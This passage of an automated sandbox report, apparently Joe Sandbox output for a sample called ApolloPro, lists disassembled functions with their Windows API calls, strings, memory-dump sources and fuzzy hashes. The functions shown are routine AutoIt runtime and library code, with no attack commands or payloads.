                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FullNamePath_memmove_wcscat
                                                                                              • String ID: so
                                                                                              • API String ID: 257928180-1026474592
                                                                                              • Opcode ID: 9e2a5497cc15a50111b9c180bfb3bcd8aed1f75a6d2c6d16f1f2d92154bf1acd
                                                                                              • Instruction ID: 2359bd155553f3315c1935007baa479867156268a9c2537d1ad9684b5f0899cb
                                                                                              • Opcode Fuzzy Hash: 9e2a5497cc15a50111b9c180bfb3bcd8aed1f75a6d2c6d16f1f2d92154bf1acd
                                                                                              • Instruction Fuzzy Hash: 6611A53190420CABCB51EBA49841EED77FBFF09350F1010A9BE48DB250DF709B845B95
                                                                                              Function 0069934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock_memmove
                                                                                              • String ID: EA06
                                                                                              • API String ID: 1988441806-3962188686
                                                                                              • Opcode ID: 4b6bd0e2d618cccfa761ae41953f02b727652fbc5258caa37609442bac7b7a3d
                                                                                              • Instruction ID: e376473fed6af49c4fa09cefacc8ad654902b57138881b47f0417df142f4b685
                                                                                              • Opcode Fuzzy Hash: 4b6bd0e2d618cccfa761ae41953f02b727652fbc5258caa37609442bac7b7a3d
                                                                                              • Instruction Fuzzy Hash: 1701F972804258BEDF18CAA8C85AEFE7BFC9B05301F00419FF553D25C1E574A6088760
                                                                                              Function 006898B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 0068B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0068B7BD
                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00689923
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: b085db943a0e74dae44b00446a8c2ab834f45db280d0638b6424dc56646a7132
                                                                                              • Instruction ID: c8e6dd5ff53a745255223c2fb77580296e599dbe863ff6f56cf93924ad554ae2
                                                                                              • Opcode Fuzzy Hash: b085db943a0e74dae44b00446a8c2ab834f45db280d0638b6424dc56646a7132
                                                                                              • Instruction Fuzzy Hash: 5801A2B2E42208ABCB14FBA0C952EFF77AF9F16340F18021DB84667281DA145E4897B5
                                                                                              Function 0068993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 0068B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0068B7BD
                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 006899A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: 2fa5498c321a8082428298494438ecf69612bfa06fdb11ad74783e08983fcb14
                                                                                              • Instruction ID: b3835beff5b57fd58a1da72955c632b21ca711286e7d959573094d77fe11ff75
                                                                                              • Opcode Fuzzy Hash: 2fa5498c321a8082428298494438ecf69612bfa06fdb11ad74783e08983fcb14
                                                                                              • Instruction Fuzzy Hash: 8001DB72E4221867CF10FBA4C952EFF77AF9F12340F18021DF84567281DA145E489775
                                                                                              Function 00656D9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __calloc_crt
                                                                                              • String ID: @bo
                                                                                              • API String ID: 3494438863-85795134
                                                                                              • Opcode ID: 62c1e9ab293c79d0b86a15325e4af30939c2e0fc92e1a0f9370f501923fa2091
                                                                                              • Instruction ID: e112c858130b94621502a9fe0c106a607f6eb65daa1c66c2e1d5f8d12435dfd0
                                                                                              • Opcode Fuzzy Hash: 62c1e9ab293c79d0b86a15325e4af30939c2e0fc92e1a0f9370f501923fa2091
                                                                                              • Instruction Fuzzy Hash: B5F03C723082128BF7648F18EC416B167A7FB00761F50296AFA00DB296EB208985D684
                                                                                              Function 006954E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcscmp
                                                                                              • String ID: #32770
                                                                                              • API String ID: 2292705959-463685578
                                                                                              • Opcode ID: a4c675069e88779948cd36217513f80b8ac094fd7e1d91ee4e34217480d7583d
                                                                                              • Instruction ID: ff31700c13349d660d868273a9102c43e62b6049474bfa4e897a90f5230b9a06
                                                                                              • Opcode Fuzzy Hash: a4c675069e88779948cd36217513f80b8ac094fd7e1d91ee4e34217480d7583d
                                                                                              • Instruction Fuzzy Hash: ECE061325003382BD7109B99AC05FB7F7ADDB04771F001057FD04D3151D5609A0587E0
                                                                                              Function 00688892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006888A0
                                                                                                • Part of subcall function 00653588: _doexit.LIBCMT ref: 00653592
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message_doexit
                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                              • API String ID: 1993061046-4017498283
                                                                                              • Opcode ID: af2d22181190a2fef89d4dfe0780de3876d0cad8df52dcb37fde0666c93ca0d2
                                                                                              • Instruction ID: b29e1150d0306b4a3f7b1e6ebbac6b43dc7e18711cc55ed45045dbec97cb1e56
                                                                                              • Opcode Fuzzy Hash: af2d22181190a2fef89d4dfe0780de3876d0cad8df52dcb37fde0666c93ca0d2
                                                                                              • Instruction Fuzzy Hash: F3D02B3138135832D39036E46C0BFDA7A4B8F05B51F00042EFF08A62C34DD1958042E9
                                                                                              Function 00670251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00670091
                                                                                                • Part of subcall function 006AC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0067027A,?), ref: 006AC6E7
                                                                                                • Part of subcall function 006AC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006AC6F9
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00670289
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                              • String ID: WIN_XPe
                                                                                              • API String ID: 582185067-3257408948
                                                                                              • Opcode ID: dd0b59ff122035dca08bff79003f29588574456b01b8536e9ee9db212473e19c
                                                                                              • Instruction ID: 755df1ada6072cce939b6368d67e098ac080854200132f35cda92695535bf4fa
                                                                                              • Opcode Fuzzy Hash: dd0b59ff122035dca08bff79003f29588574456b01b8536e9ee9db212473e19c
                                                                                              • Instruction Fuzzy Hash: 23F0C971815109DFEB65DBA0C998BECBBFAAB08310F245095E14AA2190CB754F85DF31
                                                                                              Function 00645800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyIcon.USER32(,zo0zo,006F7A2C,006F7890,?,00645A53,006F7A2C,006F7A30,?,00000004), ref: 00645823
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: DestroyIcon
                                                                                              • String ID: ,zo0zo$SZd,zo0zo
                                                                                              • API String ID: 1234817797-3609006707
                                                                                              • Opcode ID: a3d31962a32c0f5ca5f4945716f2c215ae246dbcb6e8d1d523fcf6c607dcb4bb
                                                                                              • Instruction ID: 3a6fe9d59a6395a1bbe1149ec2c51e888f1e0559469744a08b590290334f227e
                                                                                              • Opcode Fuzzy Hash: a3d31962a32c0f5ca5f4945716f2c215ae246dbcb6e8d1d523fcf6c607dcb4bb
                                                                                              • Instruction Fuzzy Hash: BFE0C232014226EFE7200F08D800BD4FFEAAF25321F248016E08147152D7B168A0CB90